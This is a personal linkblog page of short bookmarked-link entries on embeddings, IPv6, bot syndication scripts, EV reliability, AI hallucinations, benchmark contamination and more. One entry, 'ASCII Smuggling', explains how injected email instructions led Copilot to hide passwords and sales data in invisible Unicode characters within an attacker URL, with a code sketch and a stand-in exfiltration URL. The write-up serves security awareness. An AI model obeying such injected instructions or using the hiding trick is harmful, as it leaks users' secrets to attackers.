

Binary Quantization

  • Binary Quantization

    A readable explanation of the (relatively new) technique of Binary Quantization applied to LLM embeddings. It's pretty amazing that this compression technique can work without destroying search recall and accuracy, but it seems it does!

    Using BQ will reduce your memory consumption and improve retrieval speeds by up to 40x [...] Binary quantization (BQ) converts any vector embedding of floating point numbers into a vector of binary or boolean values. [...] All [vector floating point] numbers greater than zero are marked as 1. If it’s zero or less, they become 0. The benefit of reducing the vector embeddings to binary values is that boolean operations are very fast and need significantly less CPU instructions. [...] One of the reasons vector search still works with such a high compression rate is that these large vectors are over-parameterized for retrieval. This is because they are designed for ranking, clustering, and similar use cases, which typically need more information encoded in the vector.
    https://www.elastic.co/search-labs/blog/rabitq-explainer-101 is a good maths-heavy explanation of the Elastic implementation using RaBitQ. See also some results from HuggingFace, https://huggingface.co/blog/embedding-quantization .
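    As a minimal sketch of the core idea (not Elastic's RaBitQ implementation), here's how sign-based binarization and Hamming-distance comparison might look in NumPy; the 768-dimensional random vectors are just placeholders:

```python
import numpy as np

def binarize(embeddings: np.ndarray) -> np.ndarray:
    """Quantize float embeddings to packed bits: values > 0 become 1, else 0."""
    bits = (embeddings > 0).astype(np.uint8)
    return np.packbits(bits, axis=-1)      # 32x smaller than float32

def hamming_distance(a: np.ndarray, b: np.ndarray) -> int:
    """Cheap similarity proxy: count differing bits via XOR + popcount."""
    return int(np.unpackbits(a ^ b).sum())

# Toy usage: find the nearest binary-quantized document vector to a query.
rng = np.random.default_rng(0)
docs = binarize(rng.standard_normal((1000, 768), dtype=np.float32))
query = binarize(rng.standard_normal(768, dtype=np.float32))
nearest = min(range(len(docs)), key=lambda i: hamming_distance(docs[i], query))
```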

    (tags: embedding llm ai algorithms data-structures compression quantization binary-quantization quantisation rabitq search recall vectors vector-search)

[pdf] Sky UK on their IPv6/IPv4 gateways

  • [pdf] Sky UK on their IPv6/IPv4 gateways

    A presentation from RIPE89 detailing Sky's MAP-T setup, "IPv6-only with IPv4aaS (MAP-T)". Basically they now use MAP-T translation devices to provide "IPv4 as a service", transparent NAT mapping between IPv6 and IPv4. I suspect this is similar to how Virgin Media operates their network in Ireland, too. Interestingly, there are now network features (like local CDN POPs) which are more performant when using IPv6 natively, as they avoid a "trombone" route via a network-border translation device to get an IPv4 address. As a result, it's actually starting to be worthwhile running an IPv6 home network....

    (tags: ipv4 ipv6 networking home sky isps ripe map-t nat ip)

headrotor/masto-pinb

  • headrotor/masto-pinb

    from Marsh Gardiner (https://hachyderm.io/@earth2marsh ), a "Mastodon To Pinboard bookmark integration script" -- "a Python script to mimic the functionality of Pinboard's Twitter integration. It reads the latest toots from a Mastodon account and bookmarks them in a Pinboard.in account. It is meant to be run repeatedly as a crontab job to continuously update your bookmarks in the background".

    (tags: mastodon pinboard bookmarks bookmarking scripts)

skyfirehose.com

  • skyfirehose.com

    "Query the Bluesky Jetstream with DuckDB" -- this is a lovely little hack from Tobias Müller (https://bsky.app/profile/tobilg.com). Basically, it's a pre-built DuckDB database file which contains tables which refer to Parquet files in an R2 bucket, which are (presumably) updated regularly with new Bluesky posts from their Jetstream. Tobias says: "there‘s a data gathering process that listens to the Jetstream and dumps the NDJSONs to the filesystem as hourly files. Then, DuckDB transform the data to Parquet files, they get uploaded with rclone." It's a lovely demo of how modern data lake tech can be exposed for public usage in a nice way.

    (tags: s3 parquet duckdb sql jetstream bluesky firehose data-lakes r2)

The Current State of This Blog’s Syndication

For the past several years, since the demise of Google Reader, I’ve been augmenting the RSS/Atom syndication of this linkblog with posts to various social media platforms using bot accounts. This is kind of a form of POSSE -- “Publish (on your) Own Site, Syndicate Elsewhere” (ideally I’d be self-hosting Pinboard to qualify for that I guess).

Cross-posts went first to Twitter (RIP), and more recently to Mastodon via botsin.space. With the shutdown of that instance, I’ve had to make a few changes to the syndication script that gateways the content to Mastodon, and I also took the opportunity to set up a BlueSky gateway at the same time. On the prompting of @kellan, here’s a quick write-up of where it all currently stands…

Primary Source: Pinboard

The primary source for the blog’s contents is my long-suffering account at https://pinboard.in/u:jm/, where I have been collecting links since 2009 (and before that, del.icio.us since I think 2004?, so that’s 20 years of links by now).

Pinboard has a pretty simple UI for link collection using a bookmarklet, which I’ve improved a tiny bit to open a large editor textbox instead of the default tiny one.

The resulting posts generally tend to include a blockquote, a short lede, and a few tags in the normal Pinboard/Del.icio.us style.

I find editing text posts in the Pinboard bare-bones UI to be easier and more pleasant than WordPress, so I generally use that as the primary source. Based on the POSSE principle, I should really figure out a way to get this onto something self-hosted, but Pinboard works for me (at the moment at least).

Publish from Pinboard to Blog

I use a Python script, run from cron, to gateway new bookmarks from https://pinboard.in/u:jm/ to this blog as individual Markdown-formatted posts, using the WordPress posting API: Github repo
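Roughly, the shape of such a gateway looks like the sketch below -- an illustrative rewrite, not the actual script from the repo; the blog URL and credentials are placeholders, and it assumes the standard WordPress REST API with an application password:

```python
import feedparser
import requests

PINBOARD_FEED = "https://feeds.pinboard.in/rss/u:jm/"            # public Pinboard RSS feed
WP_API = "https://blog.example.com/wp-json/wp/v2/posts"          # placeholder blog URL
WP_AUTH = ("username", "application-password")                   # placeholder credentials

def crosspost_new_bookmarks(seen_urls: set[str]) -> None:
    """Post any not-yet-seen Pinboard bookmarks to WordPress as individual posts."""
    feed = feedparser.parse(PINBOARD_FEED)
    for entry in feed.entries:
        if entry.link in seen_urls:
            continue                                             # already cross-posted
        body = f'<a href="{entry.link}">{entry.title}</a>\n\n{entry.get("description", "")}'
        resp = requests.post(
            WP_API,
            auth=WP_AUTH,
            json={"title": entry.title, "content": body, "status": "publish"},
            timeout=30,
        )
        resp.raise_for_status()
        seen_urls.add(entry.link)
```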

Publish from Pinboard to Mastodon

This reads the Pinboard RSS feed for https://pinboard.in/u:jm/ and posts any new URLs (with the first 500 chars of their descriptions) to the “jmason_links” account at mstdn.social: Github repo
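A stripped-down sketch of the Mastodon side using the Mastodon.py client (the real script, with its state-keeping and deduplication, is in the repo); the access token is a placeholder:

```python
import feedparser
from mastodon import Mastodon

masto = Mastodon(
    access_token="YOUR-ACCESS-TOKEN",          # placeholder token for the bot account
    api_base_url="https://mstdn.social",
)

feed = feedparser.parse("https://feeds.pinboard.in/rss/u:jm/")
for entry in feed.entries:
    summary = entry.get("description", "")[:500]   # first 500 chars of the description
    # (the real script also tracks which URLs it has already tooted)
    masto.status_post(f"{entry.title} {entry.link}\n\n{summary}")
```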

Migration from the old Mastodon account at botsin.space to mstdn.social was really quite easy; after manually setting up the new account at mstdn.social and copying over the bio text, I hit the "Move from a different account" page, and entered @jm_links@botsin.space for the handle of the old account to migrate from.

I then logged in to the old account on botsin.space and hit the "Move to a different account" page, entering @jmason_links@mstdn.social for the handle to migrate to. This triggered copying of the followers from one account to the other, and left the old account dormant with a link to the new location instead.

(One thing to watch out for is that once the move is triggered, the profile for the old account becomes read-only; I've since had to temporarily undo the "moved" status in order to update the profile text, which was a bit messy.)

Publish from Pinboard to BlueSky

This reads the same Pinboard RSS feed as the Mastodon gateway, and gateways new posts from there to the “jmason.ie” account at BlueSky. This is slightly more involved than the Mastodon script, as it attempts to generate an embed card and mark up any links in the post appropriately: Github repo
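For comparison, a minimal sketch of the BlueSky side using the atproto Python client; the embed-card and link-markup handling that the real script does is omitted here, and the app password is a placeholder:

```python
from atproto import Client

client = Client()
client.login("jmason.ie", "app-password-here")     # placeholder app password

def post_link(title: str, url: str, summary: str) -> None:
    """Plain-text version; the real gateway also builds an embed card and link facets."""
    text = f"{title} {url}\n\n{summary}"[:300]      # BlueSky caps posts at 300 graphemes
    client.send_post(text=text)

post_link("Example bookmark", "https://example.com/", "a short description")
```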

I have a cron on my home server which runs those Mastodon and BlueSky gateway scripts every 15 minutes, and that seems to be a reasonable cadence without hammering the various APIs too much.

Used EV Buying Guide

  • Used EV Buying Guide

    This, via Reddit, is an amazing guide to buying a used electric vehicle, from Croatia's EVClinic, who are a "car reverse engineering and specialty repair outfit. Taking cars apart, figuring out how and when they break, and figuring out how to repair them is their bread and butter. They've gained a reputation across Europe for being able to fix problems that even the manufacturers themselves don't know how to deal with. They've now distilled that working experience into a report, detailing which vehicles are reliable in the long term - and which ones should be avoided. Each model also has a list of which parts are most likely to break, after how much mileage they are likely to break, and how much it costs to repair.":

    Based on our experience and that of our colleagues’ labs at 15-20 different locations worldwide, we have concluded that the battery is the last concern on the list during the first 10 years of an EV’s life, with some vehicles covering a large number of miles with the original battery system. The most common failures within 10 years of using an EV are: 1. Electric motors, 2. OBC chargers, 3. DC-DC/inverters, and only in fourth place, batteries. Some vehicles can go 10 years without any breakdowns or servicing, resulting in significant savings compared to fossil fuel vehicles. Even EVs that experience faults are cheaper to maintain than their fossil-fueled counterparts, even when factoring in battery and motor failures. Fossil fuel vehicles consume at least €0.13 per kilometer just in fuel, excluding services and breakdowns. With services, breakdowns, and maintenance, they consume an additional minimum of €0.08, totaling over €40,000 for 200,000 km. Thus, a faulty EV is still cheaper than a “functional” fossil fuel vehicle.
    The article lists the Hybrid and Battery EVs available in Europe, and gives a rating to each one regarding their reliability and repairability, in extreme detail. Unfortunately, the BEV I drive -- the Nissan Leaf -- gets a terrible review due to what they consider really crappy battery technology choices. The perils of being an early adopter.... :(

    (tags: nissan leaf bevs evs driving cars hybrid-vehicles electric-vehicles used-cars repair)

How to Learn: Userland Disk I/O

  • How to Learn: Userland Disk I/O

    This is an interesting hodge-podge of key bits of information about disk I/O, file integrity and durability, buffered or unbuffered writes, async I/O, and which filesystems to use for high-I/O database operation on Linux, MacOS and Windows. One thing that was new to me: "You can periodically scrape /proc/diskstats to self-report on disk metrics".
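    To make that concrete, a small sketch of the /proc/diskstats idea (field positions follow the kernel's iostats documentation; diff successive samples to turn the counters into rates):

```python
def read_diskstats(device: str = "sda") -> dict[str, int]:
    """Parse one device's line from /proc/diskstats into a few useful counters."""
    with open("/proc/diskstats") as f:
        for line in f:
            fields = line.split()
            if fields[2] == device:
                return {
                    "reads_completed": int(fields[3]),
                    "sectors_read": int(fields[5]),
                    "writes_completed": int(fields[7]),
                    "sectors_written": int(fields[9]),
                    "ms_doing_io": int(fields[12]),
                }
    raise ValueError(f"device {device!r} not found in /proc/diskstats")

# Scrape this periodically (e.g. from a metrics agent) and diff successive
# samples to get per-interval rates; "sda" is a placeholder device name.
print(read_diskstats("sda"))
```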

    (tags: databases filesystems linux macos fsync durability coding)

SlateDB

  • SlateDB

    an embedded storage engine built as a log-structured merge-tree. Unlike traditional LSM-tree storage engines, SlateDB writes all data to object storage [ie. S3, Azure Blob Storage, GCS]. Object storage is an amazing technology. It provides highly-durable, highly-scalable, highly-available storage at a great cost. And recent advancements have made it even more attractive: Google Cloud Storage supports multi-region and dual-region buckets for high availability. All object stores support compare-and-swap (CAS) operations. Amazon Web Service's S3 Express One Zone has single-digit millisecond latency. We believe that the future of object storage are multi-region, low latency buckets that support atomic CAS operations. Inspired by The Cloud Storage Triad: Latency, Cost, Durability, we set out to build a storage engine built for the cloud. SlateDB is that storage engine.
    This looks superb. Chris Riccomini is involved.

    (tags: data storage slatedb lsm wal oltp)

Prototype Fund

  • Prototype Fund

    This looks great!

    The first low-threshold funding program for independent developers and small teams creating innovative open-source software. We provide the tech-savvy civil society with access to the resources and processes needed for developing user-centered, innovative software projects. Since 2016, we have funded almost 400 projects. As a learning funding program, we have repeatedly made adjustments to become more efficient and effective. Now we are taking the next step and implement some significant changes. From now on, we are focusing on funding data security and software infrastructure. Apply with your ideas for innovative open source software in the public interest! You will receive up to €95,000 over six months or €158,000 over ten months of funding from the German Ministry of Education and Research. We will also provide you with coaching, consulting and networking opportunities.

    (tags: funding open-source oss via:janl)

GOV.UK chatbot halted by hallucinations

  • GOV.UK chatbot halted by hallucinations

    "AI firms must address hallucinations before GOV.UK chatbot can roll out, digital chief claims":

    Trials of a generative AI-powered chatbot for GOV.UK users have found ongoing issues with so-called hallucinations that must be addressed before the technology can be widely deployed, according to one of the government’s digital leaders. [....] Speaking at an event this morning, Paul Willmott said: “We have experimented with a generative advice [tool] on GOV.UK. You will just say ‘I’m trying to do this’, or ‘I’m annoyed about this’… The challenge we are having – which is exactly the same as in the commercial sector – is what to do with the 1% of hallucinations where the agent starts to get challenging, or abusive – or even seductive.” Even if only present in a tiny minority of instances, these issues mean that GOV.UK Chat is not yet ready for widespread deployment, according to Willmott. Addressing hallucinations will require the support of the likes of OpenAI and other creators of large language models. “Until we have managed to iron that out – which will require the support of the foundational model creators – we won’t be able to put this live,” he said.
    This is hardly surprising, but it's good to see it being acknowledged and the brakes being applied.

    (tags: ai llms hallucinations confabulation gov.uk chatbots chatgpt uk)

How the New sqlite3_rsync Utility Works

  • How the New sqlite3_rsync Utility Works

    "I've enjoyed following the development of the new sqlite3_rsync utility in the SQLite project. The utility employs a bandwidth-efficient algorithm to synchronize new and modified pages from an origin SQLite database to a replica. You can learn more about the new utility here and try it out by following the instructions here. Curious about its workings, I reviewed the code" Interesting use of a truncated SHA-3 as the hash() implementation, for speed.

    (tags: sqlite hashing rsync synchronization replication databases storage algorithms)

Using BlueSky as a Mastodon Bot

  • Using BlueSky as a Mastodon Bot

    "A Cheap and Lazy way to create Mastodon Bots using… BlueSky?!" By using the brid.gy gateway service, it's pretty trivial to use BlueSky as an easy means to make a mastodon bot without having to find a bot-friendly Masto host now that botsin.space is no more. For now, I'm doing this at @jmason.ie@bsky.brid.gy , which is gatewaying the posts from my BlueSky bot at https://bsky.app/profile/jmason.ie -- although a more long term approach will be to host the links-to-Mastodon gateway "natively" instead of using brid.gy, IMO.

    (tags: mastodon rss gateways social-media bluesky brid.gy bots linkblog)

Zuckerberg: The AI Slop Will Continue Until Morale Improves

  • Zuckerberg: The AI Slop Will Continue Until Morale Improves

    Well this is just garbage, and one reason why I no longer use Facebook:

    Both Facebook and Instagram are already going this way, with the rise of AI spam, AI influencers, and armies of people copy-pasting and clipping content from other social media networks to build their accounts. This content and this system, Meta said, has led to an 8 percent increase in time spent on Facebook and a 6 percent increase in time spent on Instagram, all at the expense of a shared reality and human connections to other humans.  In the earnings call, Zuckerberg and Susan Li, Meta’s CFO, said that Meta has already slop-ified its ad system and said that more than 1 million businesses are now creating more than 15 million ads per month on Meta platforms using generative AI. 

    (tags: slop facebook ai meta social media grim instagram)

Misusing the BIG-Bench canary string

  • Misusing the BIG-Bench canary string

    Interesting; this blog post discusses using the BIG-Bench canary string, intended to keep data like accuracy test cases out of LLM training corpora, as a general-purpose "don't scrape me" flag on personal blogs. This seems like a more practical, and more likely to be observed, way to opt out of AI training -- seeing as the scrapers don't seem to reliably honour any of the others.

    (tags: blogging canaries opt-out scraping web ai llm openai chatgpt claude bing)

Canary Contamination in GPT-4

  • Canary Contamination in GPT-4

    The BIG-Bench canary string is an EICAR- or GTUBE-style canary string which should never appear in LLM training datasets, or by extension, in trained models or their output. Its intention is that any test documents containing that string can be excluded from training, so that benchmark tests will be accurate. Unfortunately, it looks like they weren't excluded -- Claude 3.5 Sonnet and GPT-4-base will reproduce the string; and:

    Of 19 tested [benchmarking] tasks, GPT-4-base perfectly recalled large (non-trivial) portions of code for: The Abstraction and Reasoning Corpus; Simple arithmetic; Diverse Metrics for Social Biases in Language Models; Convince Me
    Great work. In case you were wondering why the LLMs all seem to do so well on their benchmarks, now you know -- they were training on the test data.

    (tags: ai llm testing benchmarking big-bench gpt-4 claude)

Reverse engineering ML models from TikTok and Instagram

  • Reverse engineering ML models from TikTok and Instagram

    This is very clever; _A Picture is Worth 500 Labels: A Case Study of Demographic Disparities in Local Machine Learning Models for Instagram and TikTok_, from University of Wisconsin-Madison and the Technical University of Munich. TikTok and Insta both use local ML models running on users' phones; by reverse engineering these APIs it's possible to test them and experiment on their accuracy.

    Capitalizing on this new processing model of locally analyzing user images, we analyze two popular social media apps, TikTok and Instagram, to reveal (1) what insights vision models in both apps infer about users from their image and video data and (2) whether these models exhibit performance disparities with respect to demographics. As vision models provide signals for sensitive technologies like age verification and facial recognition, understanding potential biases in these models is crucial for ensuring that users receive equitable and accurate services. We develop a novel method for capturing and evaluating ML tasks in mobile apps, overcoming challenges like code obfuscation, native code execution, and scalability. Our method comprises ML task detection, ML pipeline reconstruction, and ML performance assessment, specifically focusing on demographic disparities. We apply our methodology to TikTok and Instagram, revealing significant insights. For TikTok, we find issues in age and gender prediction accuracy, particularly for minors and Black individuals. In Instagram, our analysis uncovers demographic disparities in the extraction of over 500 visual concepts from images, with evidence of spurious correlations between demographic features and certain concepts.

    (tags: tiktok instagram ml machine-learning accuracy testing reverse-engineering reversing mobile android)

Hedge Funds Bet Against Clean Energy

  • Hedge Funds Bet Against Clean Energy

    Hooray! Capitalism has decided to kill off the humans:

    Despite vast green stimulus packages in the US, Europe and China, more hedge funds are on average net short batteries, solar, electric vehicles and hydrogen than are long those sectors; and more funds are net long fossil fuels than are shorting oil, gas and coal, according to a Bloomberg News analysis of positions voluntarily disclosed by roughly 500 hedge funds to Hazeltree, a data compiler in the alternative investment industry.

    (tags: hedge-funds capitalism short-selling clean-energy green future climate-change)

Bert Hubert on Nuclear power in the EU

  • Bert Hubert on Nuclear power in the EU

    "Nuclear power: no, yes, maybe, but not like this":

    Currently many (European) countries are individually trying to order up new nuclear power, from many different places. But it appears we can’t treat nuclear reactors like (say) cars you can just procure. If we’d want to do this right, it is probably indeed better to not simply try to order stuff, but to engender a nuclear revival. To not simply point our fingers at Framatome and EDF and say “do better!”. What if we actually made this a European or transatlantic project, and add the vast expertise that is still hidden within our institutes, and indeed setup a project for building 50 nuclear reactors, or more? This would allow a broad base of research that would derisk the process, so we don’t necessarily find out after 15 years of construction that the design is too complicated. And perhaps also not try to pretend that we are leaving this to the free market, but recognize this as a public activity. Doing it like this would require governments, institutes and companies to think different, and I’m reasonably sure we can’t even get this done between a few like-minded countries. Most definitely the EU would not reach consensus on this, since Germany is fundamentally opposed to anything nuclear ever.

    (tags: bert-hubert nuclear nukes nuclear-power eu future sustainability)

The “ASCII Smuggling” Attack

  • The "ASCII Smuggling" Attack

    Invisible text that AI chatbots understand and humans can't?

    What if there was a way to sneak malicious instructions into Claude, Copilot, or other top-name AI chatbots and get confidential data out of them by using characters large language models can recognize and their human users can’t? As it turns out, there was—and in some cases still is.
    Attackers used prompt injection, hidden in (untrusted) emails sent to a Microsoft 365 Copilot user; when the email is summarized using Copilot, "inside the emails are instructions to sift through previously received emails in search of the sales figures or a one-time password and include them in a URL pointing to his web server." The sensitive data is then steganographically encoded using Unicode "tags block" invisible codepoints, and included in the seemingly-innocent URL. Yet another case where AI developers have failed to study security history -- using untrusted input for in-band signalling has been a security risk since the days of phone phreaking; and allowing output characters from the entire Unicode range, instead of locking down to a safe subset, enables this silent exfiltration attack. Extra sting in the tail for Amazon: the researchers didn't even bother testing on their LLM :)
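    To make the mechanism concrete, here's a small sketch of the Unicode tags-block trick itself (the prompt-injection and exfiltration plumbing around it is omitted): each ASCII character is shifted into the invisible U+E0000 range, so the payload renders as nothing while surviving copy-and-paste inside a URL.

```python
TAG_BASE = 0xE0000   # Unicode "tags block": invisible codepoints U+E0000..U+E007F

def tag_encode(secret: str) -> str:
    """Hide printable ASCII by shifting it into the invisible tag-block range."""
    return "".join(chr(TAG_BASE + ord(c)) for c in secret if 0x20 <= ord(c) < 0x7F)

def tag_decode(text: str) -> str:
    """Recover anything hidden in the tag block from an otherwise normal string."""
    return "".join(
        chr(ord(c) - TAG_BASE)
        for c in text
        if TAG_BASE + 0x20 <= ord(c) < TAG_BASE + 0x7F
    )

url = "https://attacker.example/?q=" + tag_encode("OTP:123456")
print(url)               # displays as a bare URL; the payload is invisible
print(tag_decode(url))   # "OTP:123456"
```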

    (tags: ai security steganography exfiltration copilot microsoft openai llms claude infosec attacks exploits)

Does Open Source AI really exist?

  • Does Open Source AI really exist?

    This is absolutely spot on:

    “Open Source AI” is an attempt to “openwash” proprietary systems. In their paper “Rethinking open source generative AI: open-washing and the EU AI Act” Andreas Liesenfeld and Mark Dingemanse showed that many “Open Source” AI models offer hardly more than open model weights. Meaning: You can run the thing but you don’t actually know what it is. Sounds like something we’ve already had: It’s Freeware. The Open Source models we see today are proprietary freeware blobs. Which is potentially marginally better than OpenAI’s fully closed approach but really only marginally. [...] “Open Source” is becom[ing] a sticker like “Fair Trade”, something to make your product look good and trustworthy. To position it outside of the evil commercial space, giving it some grassroots feeling. “We’re in this together” and shit. But we’re not. We’re not in this with Mark fucking Zuckerberg even if he gives away some LLM weights for free cause it hurts his competition. We, as normal people living on this constantly warmer planet, are not with any of those people.
    As tante notes here, for the systems we are talking about today, Open Source AI isn't practically possible, because we’ll never be able to download all the actual training data -- and shame on the OSI for legitimising this attempt at "openwashing".

    (tags: llms open-source osi open-source-ai ai freeware meta training)

Obituary for Ward Christensen

  • Obituary for Ward Christensen

    "Ward Christensen, BBS inventor and architect of our online age, dies at age 78":

    On Friday, Ward Christensen, co-inventor of the computer bulletin board system (BBS), died at age 78 in Rolling Meadows, Illinois. Christensen, along with Randy Suess, created the first BBS in Chicago in 1978, leading to an important cultural era of digital community-building that presaged much of our online world today. Prior to creating the first BBS, Christensen invented XMODEM, a 1977 file transfer protocol that made much of the later BBS world possible by breaking binary files into packets and ensuring that each packet was safely delivered over sometimes unstable and noisy analog telephone lines. It inspired other file transfer protocols that allowed ad-hoc online file sharing to flourish. While Christensen himself was always humble about his role in creating the first BBS, his contributions to the field did not go unrecognized. In 1992, Christensen received two Dvorak Awards, including a lifetime achievement award for "outstanding contributions to PC telecommunications." The following year, the Electronic Frontier Foundation honored him with the Pioneer Award.

    (tags: bbses history computing ward-christensen xmodem networking filesharing)

Brian Merchant on “AI will solve climate change”

  • Brian Merchant on "AI will solve climate change"

    The neo-luddite author of "Blood in the Machine" nails the response to Eric Schmidt's pie-in-the-sky techno-optimism around AI "solving" climate change:

    Even without AGI, we already know what we have to do. [...] The tricky part—the only part that matters in this rather crucial decade for climate action—is implementation. As impressive as GPT technology or the most state of the art diffusion models may be, they will never, god willing, “solve” the problem of generating what is actually necessary to address climate change: Political will. Political will to break the corporate power that has a stranglehold on energy production, to reorganize our infrastructure and economies accordingly, to push out oil and gas. Even if an AGI came up with a flawless blueprint for building cheap nuclear fusion plants—pure science fiction—who among us thinks that oil and gas companies would readily relinquish their wealth and power and control over the current energy infrastructure? Even that would be a struggle, and AGI’s not going to doing anything like that anytime soon, if at all. Which is why the “AI will solve climate change” thinking is not merely foolish but dangerous—it’s another means of persuading otherwise smart people that immediate action isn’t necessary, that technological advancements are a trump card, that an all hands on deck effort to slash emissions and transition to proven renewable technologies isn’t necessary right now. It’s techno-utopianism of the worst kind; the kind that saps the will to act.

    (tags: ai climate eric-schmidt technology techno-optimism techno-utopianism agi neoluddism brian-merchant)

Capture less than you create

  • Capture less than you create

    I've disagreed with David Heinemeier Hansson on plenty of occasions in the past, but this is one where I'm really happy to find myself in agreement. Matt Mullenweg of WordPress went low, laying in digs about how DHH didn't profit from the success of Rails; DHH's response is perfect:

    The moment you go down the path of gratitude grievances, you'll see ungrateful ghosts everywhere. People who owe you something, if they succeed. A ratio that's never quite right between what you've helped create and what you've managed to capture. If you let it, it'll haunt you forever. So don't! Don't let the success of others diminish your satisfaction with your own efforts. Unless you're literally Mark Zuckerberg, Elon Musk, or Jeff Bezos, there'll always be someone richer than you! The rewards I withdraw from open source flow from all the happy programmers who've been able to write Ruby to build these amazingly successful web businesses with Rails. That enjoyment only grows the more successful these business are! The more economic activity stems from Rails, the more programmers will be able to find work where they might write Ruby. Maybe I'd feel different if I was a starving open source artist holed up somewhere begrudging the wheels of capitalism. But fate has been more than kind enough to me in that regard. I want for very little, because I've been blessed sufficiently. That's a special kind of wealth: Enough. And that's also the open source spirit: To let a billion lemons go unsqueezed. To capture vanishingly less than you create. To marvel at a vast commons of software, offered with no strings attached, to any who might wish to build. Thou shall not lust after thy open source's users and their success.
    Spot on.

    (tags: open-source success rewards coding software business life gratitude gift-economy dhh rails philosophy)

GSM-Symbolic

  • GSM-Symbolic

    "GSM-Symbolic: Understanding the Limitations of Mathematical Reasoning in Large Language Models", from Apple Machine Learning Research:

    We investigate the fragility of mathematical reasoning in these models and show that their performance significantly deteriorates as the number of clauses in a question increases. We hypothesize that this decline is because current LLMs cannot perform genuine logical reasoning; they replicate reasoning steps from their training data. Adding a single clause that seems relevant to the question causes significant performance drops (up to 65%) across all state-of-the-art models, even though the clause doesn't contribute to the reasoning chain needed for the final answer.
    Even better -- "the performance of all models declines when only the numerical values in the question are altered" seems to suggest that great performance on benchmarks like GSM8K just mean that the LLMs have been trained on the answers...

    (tags: training benchmarks ai llms gsm-symbolic reasoning ml apple papers gsm8k)

Shitposting, Shit-mining and Shit-farming

  • Shitposting, Shit-mining and Shit-farming

    This is where we are with surveillance capitalism and Facebook/X:

    Social media platforms are improved by a moderate tincture of shitposting. More than a few drops though, and the place begins to stink up, driving away advertisers and users. This then leads platform executives to explore the exciting opportunities of shit-mining. Social media generates a lot of content - it’s gotta be valuable somehow! Who needs content moderation if you can become a guano baron? But that only makes things worse, driving out more users and more advertisers, until eventually, you may find yourself left with a population dominated by two kinds of users (a) chumps, and (b) chump-vampirizing obligate predators. This can be a stable equilibrium - even quite a profitable one! But otherwise, it isn’t good news.
    See also a recent story in the Garbage Day newsletter (https://www.garbageday.email/p/what-feels-real-enough-to-share) about Facebook, and how its disaster-relief FB groups are becoming overrun with AI slop images:
    The Verge’s Nilay Patel recently summed up the core tension here, writing on Threads about YouTube’s own generative-AI efforts, “Every platform company is about to be at war with itself as the algorithmic recommendation AI team tries to fight off the content made by the generative AI team.” And it’s clear, at least with Meta, which side is winning the war. This week, Meta proudly announced a new video-generating tool that will make AI misinfo even more convincing — or, at least, better at generating things that feel true. And there’s really only one way to look at all of this. Meta simply does not give a shit anymore. Facebook spent most of the 2010s absorbing, and destroying, not just local journalism in the US, but the very infrastructure of how information is transmitted across the country. And they have clearly lost interest in maintaining that. Users, of course, have no where else to go, so they’re still relying on it to coordinate things like hurricane disaster relief. But the feeds are now — and seemingly forever will be — clogged with AI junk. Because you cannot be a useful civic resource and also give your users a near-unlimited ability to generate things that are not real. And I don’t think Meta are stupid enough to not know this. But like their own users, they have decided that it doesn’t matter what’s real, only what feels real enough to share.
    Given that Meta are _paying_ users to pollute their platform with low-grade AI slop engagement fuel, shit-farming seems the perfect term for that.

    (tags: garbage-day facebook meta ai ai-slop spam shitposting shitfarming shitmining dont-be-evil)

Fixing aggressive Xiaomi battery management

  • Fixing aggressive Xiaomi battery management

    I've been using a Xiaomi phone recently, running Xiaomi HyperOS 1.011.0, and one feature that bugs me constantly is that apps lose state as soon as you flip away to another app, even if only for a second; once you flip back, the app restarts. This appears to be an aspect of Xiaomi's built-in power management. I've been searching for a way to disable it, and allow multiple apps in memory simultaneously, and I've finally tracked it down.
    As described here, https://piunikaweb.com/2021/04/19/miui-optimization-missing-in-developer-options-try-this-workaround/ , you need to enable Developer Mode on the phone, enter "Additional Settings" / "Developer options", then scroll all the way down, nearly to the bottom, to "Reset to default values". Hit this _repeatedly_ (once is not enough!) until another option appears just below, called either "Turn on MIUI optimisation" or, in my case, "Turn on system optimisation"; this is enabled by default. Turn it off.
    In my case, this has fixed the flipping-between-apps problem, the phone in general is significantly snappier to respond, and WhatsApp and Telegram new-message notifications don't get auto-dismissed (which was another annoying feature previously). I suspect a load of battery optimisations and CPU throttling has been disabled. It remains to be seen what this does to my battery life, but hopefully it'll be worth it, and it'll be nice not to lose state in Chrome forms when I have to flip over to my banking app, etc.
    I won't be getting another Xiaomi phone after this; there are numerous rough edges and outright bugs in the MIUI/HyperOS platform, at least in the international ROM images, and there's no support or documentation to work around this stuff. It's a crappy user experience.

    (tags: phones mobile xiaomi miui workarounds battery options settings)

What If Data Is a Bad Idea?

  • What If Data Is a Bad Idea?

    A thought-provoking article:

    Philip Agre enumerated five characteristics of data that will help us achieve this repositioning. Agre argued that “living data” must be able to express 1. a sense of ownership, 2. error bars, 3. sensitivity, 4. dependency, and 5. semantics. Although he originally wrote this in the early 1990s, it took some time for technology and policy to catch up. I’m going to break down each point using more contemporary context and terminology:
    - Provenance and Agency: what is the origin of the data and what can I do with it (ownership)?
    - Accuracy: has the data been validated? If not, what is the confidence of its correctness (error bars)?
    - Data Flow: how is data discovered, updated, and shared (sensitivity to changes)?
    - Auditability: what data and processes were used to generate this data (dependencies)?
    - Semantics: what does this data represent?

    (tags: culture data identity data-protection data-privacy living-data open-data)

Ethical Applications of AI to Public Sector Problems

  • Ethical Applications of AI to Public Sector Problems

    Jacob Kaplan-Moss:

    There have been massive developments in AI in the last decade, and they’re changing what’s possible with software. There’s also been a huge amount of misunderstanding, hype, and outright bullshit. I believe that the advances in AI are real, will continue, and have promising applications in the public sector. But I also believe that there are clear “right” and “wrong” ways to apply AI to public sector problems.
    He breaks down AI usage into "Assistive AI", where AI is used to process and consume information (in ways or amounts that humans cannot) to present to a human operator, versus "Automated AI", where the AI both processes and acts upon information, without input or oversight from a human operator. The latter is unethical to apply in the public sector.

    (tags: ai ethics llm genai public-sector government automation)

ClassicPress

  • ClassicPress

    "A lightweight, stable, instantly familiar free open-source content management system. Based on WordPress without the block editor (Gutenberg)." Nobody seems to like the block editor, lol

    (tags: cms wordpress blogs blogging forks)

Patent troll Sable pays up, dedicates all its patents to the public

  • Patent troll Sable pays up, dedicates all its patents to the public

    This is a massive victory for Cloudflare -- way to go!

